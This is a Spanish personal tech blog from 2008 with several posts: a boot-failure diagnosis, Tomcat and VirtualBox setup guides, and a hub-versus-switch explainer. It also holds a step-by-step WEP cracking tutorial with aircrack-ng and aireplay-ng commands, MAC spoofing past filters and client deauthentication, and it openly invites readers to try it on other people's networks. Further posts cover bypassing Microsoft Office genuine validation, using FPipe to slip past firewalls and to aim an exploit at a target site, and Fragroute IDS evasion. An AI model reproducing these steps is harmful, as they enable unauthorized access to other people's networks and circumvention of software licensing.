viernes, 5 de diciembre de 2008

El virus YOYO

Buenas tardes..

este dia me encontré con un equipo que durante el arranque, al llegar a la carga del SO desde el disco duro, mandaba un mensaje así: YOYO ( las oes no son tal, sinó simbolos de infinito) y se quedaba congelado.
La verdad es que era la primera vez que lo veia, asi que me puse a indagar por internet a ver si se sabía algo. Todo lo que me encontré hacía referencia a virus.
Yo probé a cambiar todos los componentes del equipo, a ver si era algun fallo de hardware el que creaba ese mensaje. Cambié RAM, gráfica, cables, canal IDE, pero nada, seguía ahi.
La conclusión a la que llegue es que no es un virus, sino algún fallo en la controladora del disco.. Imagino que será eso.

Solución: cambiar el disco duro, pasar los datos al nuevo y listo. Pues el disco YOYO no se puede instalar ni como esclavo, pues al intentar acceder a él bloquea el equipo.

P.D. que conste que probé todos los métodos: reparar el MBR, cambiar todo el hardware adyacente, resetear la BIOS, pasar todos los antivirus conocidos, etc.
Lei por ahi que era un virus que se guardaba incluso en las memorias de los componentes como la ram o las gráficas. No lo creo, pues conecté el disco YOYO a otros equipos y ninguno se infectó. Mi opinión es esa, un fallo en la controladora o en los sectores donde se carga el MBR, pero fallo físico. Hay quien dice que consiguiño arreglar este problema y reparar el disco YOYO... yo si no lo veo no lo creo.
Y escribo este post porque vi mucha gente desorientada por ahi temiendo que era un virus. No lo es.

P.D.2.- el disco mantiene todos los datos intactos, y se pueden recuperar con un convertidor IDE/SATA a USB. Sin mas problemas. Asi que tranquilidad.

Saludos a tod@s.


domingo, 14 de septiembre de 2008

Levantar un servidor Tomcat sobre Windows Vista

Buenas,

vamos a tratar el tema de cómo levantar un servidor Tomcat sobre Vista, pues suele dar errores. Y como ya yo perdí el tiempo suficiente, no quiero que nadie más lo pierda sin tener necesidad.

Vamos allá:
  1. Y antes de nada, desactivar el UAC de Windows Vista, entrando en el panel de control, cuentas de usuario. Una vez hecho esto necesitamos reiniciar el sistema para que los cambios surtan efecto.
  2. Ahora nos bajamos el Tomcat desde la página oficial y lo descomprimimos.
  3. Una vez hecho esto, instalamos el JDK de Java, a mi la única versión que me funcionó fue la 1.5.0.16. Cuabdo acabe, necesitamos crear la variable de entorno. Vamos al Panel de Control ->Sistema->Opciones avanzadas->Variables de entorno. Aqui creamos una variable de usuario con el nombre JAVA_HOME y con destino la carpeta donde tengamos el JDK instalado, p.ej. C:\Archivos de programa\Java\jdk1.5.0_16.
  4. Bueno, pues ya tenemos el tema listo. Ahora solo nos queda probar si realmente funciona. Para ello vamos a la carpeta bin que tenemos dentro de la carpeta Tomcat. Ahi ejecutamos el archivo startup.bat. Se nos abre una ventana que nos muestra el proceso de puesta en marcha del servidor Tomcat.
Por lo menos a mi este sistema me funcionó. Remarcar que las versiones deben ser estas tal cual os las doy, pues otras las he probado y no funcionan. A veces, cuando da errores al levantar el Tomcat, con bajarlo de nuevo vale. Es una buena practica hacer una comprobacion de hash cuando se baja el archivo, pues a veces baja con errores, no nos damos cuenta y nos volvemos locos.

Para cualquier duda o aclaracion, no dudeis en poneros en contacto conmigo, intentaré ayudaros en lo que pueda. Tampoco dejeis de daros una vueltecilla por www.espaciopc.es, sobre todo si vivis en las Islas Canarias, pues es una tienda online con una gran calidad y unos precios inmejorables.

Saludillos a todo el mundo.



domingo, 31 de agosto de 2008

Validar Office

Borre el archivo C:/windows/sytem32/OGAAddin.dll [la estrellita segui hay, pero no te preocupes.]
  1. Ejecute CCleaner
  2. En la columna izquierda pulsa sobre "Herramientas"
  3. En la pestaña "Desinstalar programas" busca y pulsa sobre la entrada "OGA Notifier"
  4. En la columna derecha pulsa sobre "Ejecutar desinstalador"
  5. Cierra el programa. Al rato me desapareció la estrella
  6. Entre a la página de validación del office y listo


Ya con esto tendrás tu Microsoft Office 2007 validado, podrás descargar cualquier cosa del sitio de Microsoft Office. Cómo plantilla, imágenes prediseñadas, sonidos prediseñados, etc. Hasta actualizaciones críticas para el mismo Office.

Cabe mencionar que este método esta probado con el Microsoft Office Enterprise y Professional.

Saludos


domingo, 18 de mayo de 2008

crackear wep con Wifiway y una trajeta Intel 3945 ABG

Con este manual intentaremos demostraros lo fácil que es que os rompan la clave WEP de vuestra red inalámbrica. Hablaremos de como realizar este hack con inyección de paquetes ARP con la tarjeta Intel 3945 ABG, posibles errores y como no, posibles soluciones. También lo he conseguido con las tarjetas con chipset Zydas.

Por daros una idea de lo simple que es, a una distancia medio razonable, un par de centenar de metros, una conexión de un cliente autenticado y unos 10 minutos nos bastarán para hackear cualquier WEP de cualquier longitud, a mayor longitud de clave WEP algo más de tiempo.

Sin más pongamonos manos a la obra:­

Para el experimento hemos utilizado la distribución en CD LIVE de www.seguridadwireless.net concretamente la distribución se llama wifiway 0.6 (ya existe la versión 0.8, si alguien prueba con ella que nos cuente) y podemos descargarla de estos dos sitios, recomiendo el segundo (bastante más rápido):

ftp://files.tuto-fr.com:8080/distro/wifiway-0.6.iso
http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso

Una vez que tenemos descargada y quemada la nueva distribución la meteremos en nuestro portatil, debe tener la tarjeta Intel 3945 ABG con la que seremos capaces de inyectar paquetes, lo bueno de esta tarjeta es que a día de hoy viene en un montón de portátiles.

El fallo que le he visto a la distribución es que debemos saber de antemano cual será nuestro objetivo, ya que una vez que entramos a WifiWay 0.6 debemos saber el canal que queremos atacar. Podemos por ejemplo saber esto con swscanner (netstumbler para linux, de Ivan Forcada) o con netstumbler (para windows), una vez que tenemos el canal del objetivo arrancamos WifiWay. También es importante tener anotada la MAC de nuestra tarjeta. Con un ipconfig/all lo sabremos.

Despues de haberle dicho nuestra zona de tiempo y nuestro idioma, nos dejara en una consola, pulsad ahí "startx", nos arrancara las X de la distribución.

Lo curioso de la distribución es que divide la tarjeta Intel 3945 ABG en dos interfaces, la rtap0 para escuchar en modo monitor y la wifi0 para inyectar código al AP Objetivo.

Como ya sabemos el canal del objetivo es hora de lanzar el script que nos trae para la configuración de nuestra tarjeta, abriremos una consola y teclearemos:

wifiway:/# ipw3945_es.sh

Nos preguntará el canal, el que hayamos sacado con swscanner
No preguntará el Rate de captura, siempre a 2
Y por ultimo la MAC del AP Objetivo: yo aquí de primeras le doy la 00:11:22:33:44:55

Ahora lanzamos en la misma consola:

wifiway:/# airodump-ng rtap0

 CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47 
                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
 00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              NETGEAR                        
 00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP         bigbear                           
                                                                                                           
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                           
 00:14:6C:7A:41:81  00:0F:B5:32:31:31   51     2       14
 (not associated)   00:14:A4:3F:8D:13   19     0        4  mossy
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1     0        5

 

Debemos apuntar (o copiar seleccionando, para los no iniciados en linux, copiar se hace simplemente seleccionando y pegar con los dos botones a la vez del ratón) la MAC del AP Objetivo y su ESSID.

Lancemos de nuevo el script para la tarjeta Intel 3945 ABG, pero esta vez diciéndole la MAC del AP de verdad:

wifiway:/# ipw3945_es.sh

Canal: El correspondiente al AP Objetivo
Rate : 2
MAC : MAC del AP Objetivo

Ya tenemos preparada la tarjeta para empezar a inyectar código, tecleando en la misma consola los siguientes códigos, mandaremos con nuestra Intel 3945 ABG un paquetito de asociación al AP Objetivo:

wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)


Acabamos de ver que se ha autenticado contra el AP, es decir aceptará todo lo que le mandemos siempre y cuando vaya encriptado con la wep, lo que haremos ahora será capturar paquetes encriptados y reenviarlos de nuevo al AP, previa copia en nuestro disco duro para posterior análisis:

wifiway:/# aireplay-ng -3 -b MAC_AP -h NUESTRA_MAC wifi0

Saving ARP requests in replay_arp-0219-123051.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Ahora es momento de abrir otra consola y poner a capturar a airodump:

wifiway:/# airodump-ng -w /tmp/dump rtap0

 CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47 
                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
 00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              NETGEAR                        
 00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP         bigbear                           
                                                                                                           
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                           
 00:14:6C:7A:41:81  00:0F:B5:32:31:31   51     2       14
 (not associated)   00:14:A4:3F:8D:13   19     0        4  mossy
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1     0        5

 


Vale debemos esperar a que la primera consola, en la que está corriendo el aireplay -3 a que capture algún paquete ARP y en cuanto lo haga empezará a inyectar para generar tráfico encriptado con la clave WEP del AP Objetivo. En cuanto esto ocurra en la segunda consola, en la que esta corriendo airodump, empezaremos a ver como el numero de paquetes DATA del Ap Objetivo empieza a subir.

Cuando debemos parar, buena pregunta, para claves de 64 bits con 200.000 paquetes DATA será suficiente, para claves de 128 bits, unos 400.000.... Como no sabemos de que tamaño es la clave podemos esperar a  tener 200.000 DATA y en una tercera consola, sin parar ninguna de las otras dos, ejecutar:

wifiway:/# aircrack-ptw /tmp/dump-01.cap

This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:19:5B:97:F3:64  keyindex=0
stats for bssid 00:19:5B:97:F3:64  keyindex=0 packets=21938
Found key with len 13: 44 44 44 44 44 44 44 44 44 44 44 44 44

Si nos da la clave ya podremos parar las otras consolas, si aun no nos la da seguiremos esperando.....

10 minutos despues...............

Seguro que ya la tenemos.

Con el Chipset de Zydas (Añadido el 9-Octubre-2007)

Con el chipset de Zydas es incluso más simple, no necesitaremos lanzar ningun script, directamente nos escuchara en todos los canales y autonegociará el Rate.

Debemos seguir todas las instrucciones que se siguen para el driver de Intel, dejar claro que el driver de Zydas NO divide la interfaz en rtap y wifi0. Nos lo dejara como eth2 o eth1, dependiendo de las interfaces que tengamos. Utilizaremos para todo la misma interfaz, la que tenga nuestra tarjeta con driver Zydas.


Problemas con los que nos podemos encontrar:


NO TENGO ESPACIO EN /tmp/:

Como os he dicho una vez que alguien conecte a ese AP lo tendremos en cuestión de 10 minutos, pero hasta que alguien conecte pueden pasar horas incluso días, el problema que nos encontramos al lanzar airodump-ng -w /tmp/dump rtap0 es que tenemos poco espacio, no hay problema WifiWay monta por defecto nuestras particiones NTFS o FAT32, las deja en /mnt/sda.... Lancemos (en mi caso, tengo una carpeta llamada comparto en mi segunda particion NTFSm ahí si que hay gigas):

wifiway:/# airodump-ng -w /mnt/sda5/comparto/dump rtap0

Con esto podemos esperar hasta semanas a que el AP Objetivo reciba una conexión.

NO ASOCIA CON aireplay-ng -1 0

Muy bien se puede deber a un par de cosas, por lo que a mi me ha ocurrido.

No tenemos la señal suficiente (esto deberiamos saberlo con swscanner o netstumbler), sigue intentandolo, pero te aseguro que la distancia es importante, despues lo tendrás bastante fastidiado en la inyección de paquetes, veras que no suben :-(, intenta acercarte.

Si estas seguro de tener señal suficiente, entonces seguramente el AP tenga Filtro MAC, no ocurre nada, podremos HAckearlo exactamente igual, con un par de trucos:

Si os fijáis airodump tiene dos apartados, uno para APS Objetivos (la parte de arriba) y otra parate de clientes conectados (la de abajo), cuestión de esperar a que un cliente con una mac valida se conecte al AP Objetivo y genere trafico, de esta forma sabremos que la MAC es valida para el AP, copiaremos esa MAC y cambiaremos la nuestra por la del cliente con este código:

wifiway:/# ifconfig wifi0 hw ether MAC_CLIENTE_AUTENTICADO

Ahora debemos comenzar el proceso exactamente igual pero poniendo nuestra "nueva" MAC.

INYECTA ARP PERO NO SUBEN LOS DATA

Casi seguro que es por distancia, en un par de experimentos me ha ocurrido eso, no sube o sube muy lento en relación con los paquetes ARP inyectados, es cuestión de distancia, los paquetes enviados al AP no le llegan.

Mi consejo es que vayáis probando con la vuestra y luego con alguna otra ;-)

Si alguien tiene algún problema más que lo vaya escribiendo en el FORO e iremos intentando resolver todas las dudas.

El caso es que el AP al que estamos conectandonos nos desautentica, se soluciona volviendo a asociarse con:

wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0

Podemos utilizar el truco de Tase, podemos poner en la linea de comando lo siguiente:

wifiway:/# while [true] do aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0; sleep 180 done

HAY DATA PERO NO ARP

Esto se debe a que cuando te has puesto a inyectar paquetes el cliente ya estaba conectado y no genera paquetes ARP, hay dos soluciones, una es esperar a que vuelva a conectarse y otra segunda es enviar un paquete de falsa desautenticación al AP para que desconecte al cliente que está asociado y de esa forma el cliente tenga que volver a asociarse, generando de esta forma paquetes ARP para su posterior inyección, para hacerlo debemos teclear en una consola nueva lo siguiente, sin cancelar ninguna de las otras (bendito aireplay-ng ;-)):

wifiway:/# aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENTE_A_DESAUTENTICAR wifi0

 

CONVERSOR UNIVERSAL DE CODIFICACIONES 

He puesto en Improvisa un Conversor Universal para pasar de cualquier código a cualquier código, por si alguien quiere cambiar la clave de HEX. (que es como nos la va a dar aircrack-ptw)  a ASCII, podeis visitarlo aquí, tambien en la sección de Informática en el árbol de la izquierda.

Conversor Universal en Improvisa


SOLUCIONES PARA ASEGURAR NUESTRA WIFI:

Utilicemos, si nos es posible, WPA, bastante mas difícil de hackear (también es posible, a lo mejor el próximo experimento es con WPA).

Utiliza cable, no se porque pero los que conocen un poquitín el mundo del wifi siempre intentan tener cable ;-)

La que mas me gusta es, comparte la wifi, la mayoría de nosotros estamos obsesionados con que no nos entren en la wifi, pero ¿por que?, podemos montarnos un NoCatSplash, la gente entrará a nuestra wifi con un ancho de banda máximo y encima le recibiremos con una pagina del tipo: "Está usted navegando gracias a la wifi del Vecino del 3º F, no me cobren la comunidad" o alguna gracias de esas ;-). Para montar NoCATSpalsh necesitaremos un Openwrt, y un hardware que lo soporte, unos 60 euros. Si no queremos gastarnos nada y tenemos un servidor también podemos hacerlo con Squid y CAPO, un plugin para Squid que funciona igual que NoCatSplash.

Si alguien prueba con otras tarjetas en esta misma distribución y le funciona, id diciendonoslas para ir actualizando el documento.


jueves, 15 de mayo de 2008

redireccionar puertos por software

La redirección de puertos envia solo valores desde un puerto TCP a otro puerto TCP. No debe pensar que se hacen conversiones de algún tipo ni cualquier otra manipulación de datos. El redireccionamiento de las conexiones web del puerto 80 al puerto 443 no modificará en forma alguna las conexiones HTTP cambiandolas a HTTPS cifradas.

Una herramienta para windows para redireccionamiento de puertos es FPIPE que puedes bajarla desde foundstone.com

FPIPE no necesita ninguna DLL o cualquier otro archivo para su funcionamiento, pero solo funciona bajo windows NT, 2000 y XP. FPIPE necesita del empleo de algunas opociones desde la linea de comando para poder trabajar.

FPIPE no queda en segundo plano, continua infomando sobre conexiones hasta que se pulse ctrl - c. Este programa indica la dirección IP equivalente y el número de puerto origen de cada conexión.

FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com

FPipe [-hvu?] [-lrs ] [-i IP] IP

-?/-h - muestra la ayuda
-c - conexiones máximas TCP simultáneas permitidas . Defecto es 32
-i - Lista de interfaces de direcciones IP
-l - Lista de puertos
-r - Puerto remoto
-s - Puerto de salida
-u - Modo UDP
-v - Modo verbo


Detalles de las opciones
-------------------------

- h o -?
Muestra la ayuda

- c
especifica el número máximo de las conexiones simultáneas TCP que el programa puede manejar. El número del defecto es 32. Si usted está planeando en usar FPipe para las peticiones del HTTP puede ser que sea recomendable levantar este número.

- i
especifica el interfaz del IP en el cual el programa escuchará. Si esta opción no se utiliza FPipe escuchará en cualquier interfaz que el sistema operativo se determina es el más conveniente.

- l
especifica el número de puerto de acceso del servidor el escuchar de FPipe. Éste es el número de acceso que escucha conexiones en la máquina de FPipe.

- r
especifica el número de puerto de acceso remoto. Éste es el número de acceso en la máquina remota con la cual será conectado.

- s
especifica el número de acceso de la fuente local de salida de la conexión. Éste es el número de acceso de el cual los datos enviados de la máquina del servidor de FPipe vendrán cuando están enviados a la máquina remota.

- u
fija el programa al funcionamiento en modo UDP. FPipe remitirá todos los datos del UDP enviados a y recibidos de cualquier lado del servidor de FPipe (la máquina en el cual FPipe está funcionando). Puesto que el UDP es un protocolo sin conexión - la opción de c no tiene sentido con esta opción.

- v
La información adicional será mostrada

- IP especifica el IP ADDRESS del anfitrión remoto.

veamos un ejemplo:

1.- c:\> fpipe -l 139 -r 139 -s 88 192.168.0.253

El tráfico SMB de sde la redireción del puerto tiene un puerto origen 88. Este tipo de truco sirve para burlas a firewall que esten mal configurados. Otros puertos que se pueden usar son: 20, 25, 53 y 80

2.- c:/> fpipe -l 80 -r 22 -i 192.168.0.1 192.168.0.254
Esta forma es de utilidad en los servidores web, es decir, el servicio web de IIS se puede enlazar a un adaptador especifico cualquiera, pero el puerto 80 esta permitido para todas las interfaces. Si configura fpipe para escuchar en una de las otras interfaces el puerto 80 es suyo. :D

3.- Imaginemos que tenemos un exploits que debe ser ejecutado contra el puerto 80 pero el punto vulnerable del sitio que ataca el exploits esta escuchando en otro puerto digamos el 7070, al redireccionar el puerto podemos resolver esa discrepancia.

c:/>fpipe -l 80 -r 7070 www.elsitiodeataque.com


Prueba diferentes configuraciones para tus herramientas y suerte.

hub vs. switch

Estos términos llevan a una confusión normal, lee este artículo y así comprenderas que diferencia hay.
Un HUB tal como dice su nombre es un concentrador. Simplemente une conexiones y no altera las tramas que le llegan. Para entender como funciona veamos paso a paso lo que sucede aproximadamente) cuando llega una trama.
1- El HUB envía información a ordenadores que no están interesados. A este nivel sólo hay un destinatario de la información, pero para asegurarse de que la recibe el HUB envía la información a todos los ordenadores que están conectados a él, así seguro que acierta.
2 - Este tráfico añadido genera más probabilidades de colisión. Una colisión se produce cuando un ordenador quiere enviar información y emite de forma simultánea que otro ordenador que hace lo mismo. Al chocar los dos mensajes se pierden y es necesario retransmitir. Además, a medida que añadimos ordenadores a la red también aumentan las probabilidades de colisión.
3 - Un HUB funciona a la velocidad del dispositivo más lento de la red. Si observamos cómo funciona vemos que el HUB no tiene capacidad de almacenar nada. Por lo tanto si un ordenador que emite a 100 megabit le trasmitiera a otro de 10 megabit algo se perdería el mensaje. En el caso del ADSL los routers suelen funcionar a 10 megabit, si lo conectamos a nuestra red casera, toda la red funcionará a 10, aunque nuestras tarjetas sean 10/100.
4 - Un HUB es un dispositivo simple, esto influye en dos características. El precio es baratito. El retardo, un HUB casi no añade ningún retardo a los mensajes.
///////////////////////////////////////
Cuando hablamos de un switch lo haremos refiriéndonos a uno de nivel 2, es decir, perteneciente a la capa Enlace de datos. Normalmente un switch de este tipo no tiene ningún tipo de gestión, es decir, no se puede acceder a él. Sólo algunos switch tienen algún tipo de gestión pero suele ser algo muy simple. Veamos cómo funciona un switch.
Puntos que observamos del funcionamiento de los switch:
1 - El ;switch conoce los ordenadores que tiene conectados a cada uno de sus puertos (enchufes). Cuando en la especificación del un switch leemos algo como 8k MAC address table se refiere a la memoria que el switch destina a almacenar las direcciones. Un switch cuando se enchufa no conoce las direcciones de los ordenadores de sus puertos, las aprende a medida que circula información a través de él. Con 8k hay más que suficiente. Por cierto, cuando un switch no conoce la dirección MAC de destino envía la trama por todos sus puertos, al igual que un HUB Flooding, inundación). Cuando hay más de un ordenador conectado a un puerto de unswitch este aprende sus direcciones MAC y cuando se envían información entre ellos no la propaga al resto de la red, a esto se llama filtrado.
El tráfico entre A y B no llega a C. Como decía, esto es el filtrado. Las colisiones que se producen entre A y B tampoco afectan a C. A cada parte de una red separada por un switch se le llama segmento.
2 - El switch almacena la trama antes de reenviarla. A este método se llama store forward es decir: almacenar y enviar. Hay otros métodos como por ejemplo Cut-through que consiste en recibir los 6 primeros bytes de una trama que contienen la dirección MAC y a partir de aquí ya empezar a enviar al destinatario. Cut-through no permite descartar paquetes defectuosos. Un switch de tipo store & forward controla el CRC de las tramas para comprobar que no tengan error, en caso de ser una trama defectuosa la descarta y ahorra tráfico innecesario. El store & forward también permite adaptar velocidades de distintos dispositivos de una forma más cómoda, ya que la memoria interna del switch sirve de buffe. Obviamente si se envía mucha información de un dispositivo rápido a otro lento otra capa superior se encargará de reducir la velocidad.
Finalmente comentar que hay otro método llamado Fragment-free que consiste en recibir los primeros 64 bytes de una trama porque es en estos donde se producen la mayoría de colisiones y errores. Así pues cuando vemos que un switch tiene 512KB de RAM es para realizar el store & forward. Esta RAM suele estar compartida entre todos los puertos, aunque hay modelos que dedican un trozo a cada puerto.
3 - Unswitch moderno también suele tener lo que se llama Auto-Negotation, es decir, negocia con los dispositivos que se conectan a él la velocidad de funcionamiento, 10 megabit ó 100, así como si se funcionara en modo ;full-duplex o half-duplex. Full-duplex; se refiere a que el dispositivo es capaz de enviar y recibir información de forma simultánea, half-duplex por otro lado sólo permite enviar o recibir información, pero no a la vez.
4 - Velocidad de proceso: todo lo anterior explicado requiere que el switch tenga un procesador y claro, debe ser lo más rápido posible. También hay un parámetro conocido como back-plane o plano trasero que define el ancho de banda máximo que soporta un switch. El back plane dependerá del procesador, del número de tramas que sea capaz de procesar. Si hacemos números vemos lo siguiente: 100megabits x 2 (cada puerto puede enviar 100 megabit y enviar 100 más en modo ull-duplex x 8 puertos = 1,6 gigabit. Así pues, un switch de 8 puertos debe tener unback-plane de 1,6 gigabit para ir bien. Lo que sucede es que para abaratar costes esto se reduce ya que es muy improbable que se produzca la situación de tener los 8 puertos enviando a tope... Pero la probabilidad a veces no es cierta ;)
5 - Si un nodo puede tener varias rutas alternativas para llegar a otro un switch tiene problemas para aprender su dirección ya que aparecerá en dos de sus entradas. A esto se le llama loop y suele haber una lucecita destinada a eso delante de los switch. El protocolo de Spanning Tree Protocol IEEE 802.1d se encarga de solucionar este problema, aunque los switch domésticos no suelen tenerlo... No hagáis redondas...

camuflar programas


Una herramienta nueva para manipular los paquetes de datos que viajan en Internet podría permitir que los atacantes camuflen programas malévolos lo suficiente para puentear muchos sistemas y cortafuegos y evitar su detección.






Arbor Networks security researcher Dug Song colocó la herramienta en su Web site esta semana.

Las extremas herramientas de los hackers que buscan romper las redes y de las empresas que las defienden de ellos , por lo menos para el momento. Cualquier cortafuego o sistema de detección de intrusios que falle en la prueba de Fragroute indica que es vulnerable a ataques usando programas maliciosos.

El programa de Fragroute es un programa de uso dual: Ilumina debilidades en la seguridad de una red -- la información que puede ayudar a un administrador de sistema en la protección de la red o ayudar a un hacker a atacar la red. El programa explota varias maneras de insertar datos específicos en una secuencia de la información para engañar programas de detección.

El programa explota los sistemas de detección de intrusos, que comprueban a menudo la corrección de datos entrantes menos riguroso que el software del servidor que es apuntado típicamente por los hackers. En una versión de tales ataques del "ingreso", un comando enviado a un servidor podía ser disfrazado agregando datos extraños, ilegítimos. El software apuntado del servidor lanzará lejos cualquier mal dato, dejándose con un válido, pero malévolo, comando.

Sin embargo, muchos sistemas de detección no quitan los datos corrompidos, así que el resto hostil del comando queda disfrazado del reconocimiento del sistema quedando funcionando.

Por ejemplo, un sistema de detección que mira hacia fuera para un desbordamiento reciente del almacenador intermediario pudo reconocer el ataque por texto HTTP:///" al aparecer en los datos entrantes. Sin embargo, si un atacante envía "http://somegarbagehere/" y sabe que la porción del" somegarbagehere "será lanzado hacia fuera por la computadora objetivo, aún el ataque todavía queda operativo. Por otra parte, si el sistema de detección no quita la misma porción del texto que el servidor, no reconocerá la amenaza y el ataque quedará activo.

Muchos de los ataques no trabajarán contra Snort si se configura correctamente, Roesch dijo que la configuración por defecto no detecta los datos camuflados, porque tales ajustes producen un número lejos mayor de alarmar falsos.

Baja la herramienta desde:
http://www.monkey.org/~dugsong/fragroute/



http://www.adobe.es/products/acrobat/readstep2.html.

instalar windows xp en ubuntu

VirtualBox es un excelente software de virtualización que nos permite ejecutar otros sistemas operativos como cualquier distribución de GNU/Linux o versión de Windows en Ubuntu.

Vamos a emplear la VirtualBox OSE (Open Source Edition): Que es la versión de código abierto, distribuida bajo la licencia GPL. Es la que vamos a encontrar en los repositorios oficiales de Ubuntu junto al módulo que necesitamos precompilado.

Virtualbox nos permite en principio crear una máquina virtual para ejecutar los siguientes sistemas operativos:

DOS - Windows 3.1 - Windows 95 - Windows 98 - Windows NT 4 - Windows Me - Windows 2000 - Windows XP - Windows Server 2003 - Windows Vista - OS/2 Warp 3 - OS/2 Warp 4 - OS/2 Warp 4.5 - Linux 2.2 - Linux 2.4 - Linux 2.6 - FreeBSD - OpenBSD - NetBSD - Netware - Solaris - L4

En la página web oficial se puede encontrar los paquetes .deb para cada versión de Ubuntu y también se proporcionan unos repositorios para mantener los paquetes actualizados. Es recomendable agregar los repositorios e instalar mediante aptitude o cualquier otro programa.

1.- Descargar Virtual Box
Ingresa a: http://www.virtualbox.org/wiki/Downloads

Click en Binaries (all platforms), una vez en la página web de SUN, elige la versión de tu Ubuntu, descarga ahora el .deb que eligiste y guardalo en tu disco.

2.- Instalar
Dale doble click sobre el archivo que descargaste y se te abrirá el GDebi PI, comenzará la instalación del paquete, en algún momento de solicitará tu calve "sudo"

Ahora vamos a colocar los permisos necesarios tanto para grupos de usuarios y usuarios, crearemos un grupo nuevo de nombre vboxusers y realzaremos Algunos cambios y comprobaciones para estar seguros que nuestro usuario tiene privilegios sobre que precise para que Virtualbox nos trabaje tal como esperamos.

a) Sistema - Administración - Usuarios y Grupos
b) Click en Administrar Grupos. Se abrirá una ventana con la lista de grupos de usuarios. Selecciona el grupo vboxusers, en el botón Propiedades. Nos aparecerá la ventana de configuración del grupo vboxusers. Seleccionamos los usuarios (nosotros y el de otro usuario del sistema que sabemos va a usar el VirtualBox). Luego le damos en "Aceptar" y listo!.
c) Procedemos a Crear una Máquina Virtual: Para abrir el programa hemos de ir a:
Aplicaciones - Herramientas del Sistema - Innotek VirtualBox Para crear una máquina virtual tendremos que pulsar en "Nueva" o teclear Ctrl + N
Nos aparecerá una nueva ventana ("ayudante de instalación").
Solo tendremos que seguir las instrucciones del ayudante haciendo click en "Siguiente". Nos aparecerá la siguiente ventana, en la que tenemos que colocar el nombre de nuestra nueva máquina virtual.
En el desplegable hay que seleccionar el sistema operativo correspondiente. En este caso Windows XP.

La siguiente ventana nos pide que indiquemos la cantidad de memoria RAM que vamos a reservar a la máquina virtual. Por defecto nos indica 192Mb. Con 192M, un Windows XP virtualizado casi vacío (sin ningún tipo aplicación como por ejemplo sin antivirus) funciona perfectamente. Decide tu cuanta RAM asignarle (en mi caso le coloque 1GB de RAM. De todos modos esos valores pueden ser modificados luego.

A continuación aparecerá una pantalla que nos pide que asignemos un disco virtual para nuestra máquina. Podemos elegir entre crear un disco o usar uno creado por nosotros previamente. En este caso en particular crearemos un nuevo disco. Si decidimos el asistente de creación de Discos nos llevará paso a paso.

Si pulsamos en "siguiente" nos aparece una ventana que nos hace decidir entre dos opciones
** Crear una imagen de disco de expansión dinámica (disco virtual que crece dinámicamente a medida que se va llenando)
** Crear una imagen de tamaño fijo

Seleccionaremos la opción de Imagen de Expansión Dinámica y pulsaremos en "Siguiente", por lo que nos aparecerá una ventana donde le colocaremos el nombre a la imagen del disco virtual, para ubicarla en nuestra PC y asignandole el tamaño que le comunicará que tiene al sistema. Este valor es teórico, porque varía en función del uso que le demos a nuestra máquina virtual

Una vez decididos los parámetros, pulsaremos en "Siguiente" y se nos muestra un resumen de las características de nuestro nuevo disco virtual. Pulsamos "Terminar" pasamos a la ventana final del ayudante de creación de la nueva máquina virtual.

3.- Configurar Máquina Virtual

a) Seleccionar la nueva máquina virtual que acabas de crear y hacemos click en "Configuración", aparecerá una ventana con las distintas posibilidades de configuración de nuestra máquina virtual. Realiza los cambios que consiredes necesarios y listo.

4.- Instalación de un sistema operativo Windows XP

Colocar el l Cd Windows en la unidad CD/DVD de nuestra pc y seleccionar la máquina virtual que hemos creado antes.

A continuación tenemos que pulsar el botón "Iniciar" o hacer doble click sobre la máquina en cuestión. La máquina creada arrancará primero desde disquete (si lo has habilitado antes), si no encuentra disquete buscará en el lector de Cds/Dvds y se iniciará la instalación de windows como si en una sesión de ordenador normal se tratara. El resto del proceso sería una instalación estándar de Windows.

Es interesante saber que si se hace "click" con el ratón dentro de la ventana del sistema operativo invitado (Windows) el teclado y el ratón son capturados por ella y por tanto funcionarán sólo dentro de ella. Para devolver el control a nuestro sistema anfitrión (Ubuntu) tenemos que pulsar una vez la tecla CTRL derecha de nuestro teclado. Esta tecla es referida por Virtualbox como Host y será utilizada en combinación con otras para algunos atajos de teclado que nos pueden ser útiles.

5.- Añadir VboxGuestAdditions

Los Guest Additions son complementos que al instalarse en nuestra recientemente creada máquina virtual le confieren a ésta un incremento en el rendimiento del sistema invitado, además de una mayor interoperatividad entre el sistema anfitrión (en nuestro caso Ubuntu) y el sistema invitado (por el ejemplo anterior, Windows XP). Un ejemplo de ello es si queremos tener algún directorio compartido entre nuestra máquina virtual y el sistema anfitrión. Tener los VboxGuestAdditions instalados es requisito indispensable.

a) Una vez iniciado el sistema operativo invitado (en nuestro caso, Windows) iremos a la barra de menús de la ventana de nuestra máquina virtual VirtualBox y pulsaremos sobre "Dispositivos"

Para instalar los VboxGuestAdditions podemos emplear dos sistemas:

*Mediante Barra de Menús de la Máquina Virtual (recomendado)
*Mediante CD/DVD de Arranque (proceso lento)

